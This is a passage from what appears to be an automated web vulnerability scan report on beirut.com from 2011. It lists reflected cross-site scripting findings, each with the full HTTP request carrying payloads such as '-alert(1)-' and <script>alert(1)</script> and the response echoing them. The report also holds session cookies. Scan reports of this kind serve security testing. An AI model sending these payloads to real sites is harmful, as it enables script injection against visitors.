Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:30:35 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61930

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Shopping/Clothing-Accessories5b3d8'-alert(1)-'93e2feb3b08/194367784/Clothing/8';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.792. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Clothing/8 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Clothing-Accessories/194367784/Clothing/8

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 773aa'-alert(1)-'3b3431ae4a2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Clothing-Accessories/194367784773aa'-alert(1)-'3b3431ae4a2/Clothing/8 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:41:47 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61399

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Shopping/Clothing-Accessories/194367784773aa'-alert(1)-'3b3431ae4a2/Clothing/8';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.793. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Clothing/8 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Clothing-Accessories/194367784/Clothing/8

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e762b'-alert(1)-'b7da0b992a8 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Clothing-Accessories/194367784/Clothinge762b'-alert(1)-'b7da0b992a8/8 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:49:12 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62286

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Shopping/Clothing-Accessories/194367784/Clothinge762b'-alert(1)-'b7da0b992a8/8';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.794. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Clothing/8 [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Clothing-Accessories/194367784/Clothing/8

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9fb8e'-alert(1)-'9408840ac16 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Clothing-Accessories/194367784/Clothing/89fb8e'-alert(1)-'9408840ac16 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:56:00 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55288

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Shopping/Clothing-Accessories/194367784/Clothing/89fb8e'-alert(1)-'9408840ac16';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.795. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Cosmetics/34 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/Shopping/Clothing-Accessories/194367784/Cosmetics/34

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60c57"><a>4f75c0944c4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Shopping60c57"><a>4f75c0944c4/Clothing-Accessories/194367784/Cosmetics/34 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:58:51 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60292

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Shopping60c57"><a>4f75c0944c4">
...[SNIP]...

4.796. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Cosmetics/34 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Clothing-Accessories/194367784/Cosmetics/34

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2c3a5'-alert(1)-'62451a45166 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping2c3a5'-alert(1)-'62451a45166/Clothing-Accessories/194367784/Cosmetics/34 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:07:03 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60207

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Shopping2c3a5'-alert(1)-'62451a45166/Clothing-Accessories/194367784/Cosmetics/34';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.797. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Cosmetics/34 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Clothing-Accessories/194367784/Cosmetics/34

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e461b'-alert(1)-'1f0c6034c44 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Clothing-Accessoriese461b'-alert(1)-'1f0c6034c44/194367784/Cosmetics/34 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:11:19 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61868

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Shopping/Clothing-Accessoriese461b'-alert(1)-'1f0c6034c44/194367784/Cosmetics/34';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.798. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Cosmetics/34 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Clothing-Accessories/194367784/Cosmetics/34

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 2f203<script>alert(1)</script>392bfe39fc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Shopping/Clothing-Accessories2f203<script>alert(1)</script>392bfe39fc/194367784/Cosmetics/34 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:12:07 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61857

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<p class="main-vista">Clothing Accessories2f203<script>alert(1)</script>392bfe39fc <a href="#" id="backlink">
...[SNIP]...

4.799. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Cosmetics/34 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Clothing-Accessories/194367784/Cosmetics/34

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9a874'-alert(1)-'53dfde29a7a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Clothing-Accessories/1943677849a874'-alert(1)-'53dfde29a7a/Cosmetics/34 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:17:25 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61375

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Shopping/Clothing-Accessories/1943677849a874'-alert(1)-'53dfde29a7a/Cosmetics/34';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.800. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Cosmetics/34 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Clothing-Accessories/194367784/Cosmetics/34

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5848c'-alert(1)-'fe4310aff25 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Clothing-Accessories/194367784/Cosmetics5848c'-alert(1)-'fe4310aff25/34 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:24:45 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61847

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Shopping/Clothing-Accessories/194367784/Cosmetics5848c'-alert(1)-'fe4310aff25/34';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.801. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Cosmetics/34 [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Clothing-Accessories/194367784/Cosmetics/34

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b727e'-alert(1)-'e987292a2c9 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Clothing-Accessories/194367784/Cosmetics/34b727e'-alert(1)-'e987292a2c9 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:27:18 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55315

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Shopping/Clothing-Accessories/194367784/Cosmetics/34b727e'-alert(1)-'e987292a2c9';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.802. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Fragrance/39 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Clothing-Accessories/194367784/Fragrance/39

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 63e2a'-alert(1)-'242e5a582a6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping63e2a'-alert(1)-'242e5a582a6/Clothing-Accessories/194367784/Fragrance/39 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:03:03 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60267

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Shopping63e2a'-alert(1)-'242e5a582a6/Clothing-Accessories/194367784/Fragrance/39';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.803. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Fragrance/39 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/Shopping/Clothing-Accessories/194367784/Fragrance/39

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97c42"><a>2bff35564b4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Shopping97c42"><a>2bff35564b4/Clothing-Accessories/194367784/Fragrance/39 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:52:20 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60501

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Shopping97c42"><a>2bff35564b4">
...[SNIP]...

4.804. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Fragrance/39 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Clothing-Accessories/194367784/Fragrance/39

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 10209<script>alert(1)</script>85b58cd2fad was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Shopping/Clothing-Accessories10209<script>alert(1)</script>85b58cd2fad/194367784/Fragrance/39 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:08:25 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
